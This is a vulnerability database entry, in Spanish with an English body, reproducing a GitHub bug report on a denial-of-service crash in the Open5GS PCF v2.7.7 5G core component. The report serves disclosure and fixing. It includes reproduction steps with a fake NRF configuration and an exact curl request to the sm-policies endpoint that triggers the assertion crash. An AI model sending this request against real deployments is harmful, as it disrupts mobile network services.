| Título | Open5gs PCF v2.7.7 Denial of Service |
|---|
| Descripción | ### Open5GS Release, Revision, or Tag
v2.7.7
### Steps to reproduce
PCF crashes if an `SM Policy Association` request triggers `NBSF_MANAGEMENT`
discovery and the original client disconnects before the delayed NRF discovery
response arrives.
The `SM Policy Association` creation path for a VPLMN SUPI calls:
```c
pcf_sess_sbi_discover_and_send(
OGS_SBI_SERVICE_TYPE_NBSF_MANAGEMENT, ...);
```
When the delayed `NNRF_DISC` response is later processed, the PCF discovery
handler checks whether a BSF instance was found. If not, it tries to recover by
sending a fallback response on the original associated stream:
```c
stream = ogs_sbi_stream_find_by_id(xact->assoc_stream_id);
ogs_assert(stream);
```
If the original requester already timed out and closed the HTTP/2 stream,
`ogs_sbi_stream_find_by_id()` returns `NULL`, and the assertion kills PCF.
### Steps to reproduce
This live reproduction used a temporary fake NRF endpoint returning a delayed
empty `SearchResult`, plus a temporary `pcf.yaml` pointing `client.nrf` to that
fake NRF. After validation, the config was restored.
1. Point `/home/ubuntu/docker-open5gs/configs/basic/pcf.yaml` to a fake NRF:
```yaml
pcf:
serving:
- plmn_id:
mcc: 001
mnc: 01
sbi:
client:
nrf:
- uri: http://10.33.33.1:18081
```
2. Restart `pcf`.
3. Run a fake HTTP/2 cleartext NRF that:
- returns `204` to registration-related paths
- returns `201` to subscription creation
- returns `200 {"nfInstances":[]}` to `/nnrf-disc/v1/nf-instances` after a
3 second delay
4. Send a VPLMN `SM Policy Association` request with a 1-second timeout:
```bash
curl --http2-prior-knowledge --max-time 1 -sS -i \
-X POST http://10.33.33.7/npcf-smpolicycontrol/v1/sm-policies \
-H 'content-type: application/json' \
--data '{"supi":"imsi-999700000000001","pduSessionId":9,"pduSessionType":"IPV4","dnn":"internet","notificationUri":"http://127.0.0.1:9999/cb","ipv4Address":"10.0.0.9","sliceInfo":{"sst":1,"sd":"000001"}}'
```
5. Wait for the delayed discovery response to arrive, then inspect PCF logs and
container state.
### Logs
```shell
Original requester:
curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
PCF logs:
04/10 18:47:24.412: [sbi] WARNING: Try to discover [nbsf-management] (../lib/sbi/path.c:563)
04/10 18:47:25.413: [sbi] INFO: RST_STREAM received: stream_id=1 (../lib/sbi/nghttp2-server.c:1288)
04/10 18:47:27.419: [pcf] ERROR: [Unknown:imsi-999700000000001:9] (NF discover) No [nbsf-management:PCF] (../src/pcf/nnrf-handler.c:82)
04/10 18:47:27.419: [pcf] FATAL: pcf_nnrf_handle_nf_discover: Assertion `stream' failed. (../src/pcf/nnrf-handler.c:96)
After the crash, the PCF container restarted automatically.
```
### Expected behaviour
If the requester disconnects before delayed BSF discovery completes, PCF should discard the late result or fail the transaction without dereferencing a dead stream.
### Observed Behaviour
The original client times out, the HTTP/2 stream is removed, and the delayed discovery response causes PCF to assert on a `NULL` stream pointer and crash.
### eNodeB/gNodeB
Not required.
### UE Models and versions
Not required. |
|---|
| Fuente | ⚠️ https://github.com/open5gs/open5gs/issues/4438 |
|---|
| Usuario | LinZiyu (UID 94035) |
|---|
| Sumisión | 2026-04-20 20:37 (hace 1 mes) |
|---|
| Moderación | 2026-05-09 09:35 (19 days later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 362440 [Open5GS hasta 2.7.7 sm-policies Endpoint pcf_sess_sbi_discover_and_send denegación de servicio] |
|---|
| Puntos | 20 |
|---|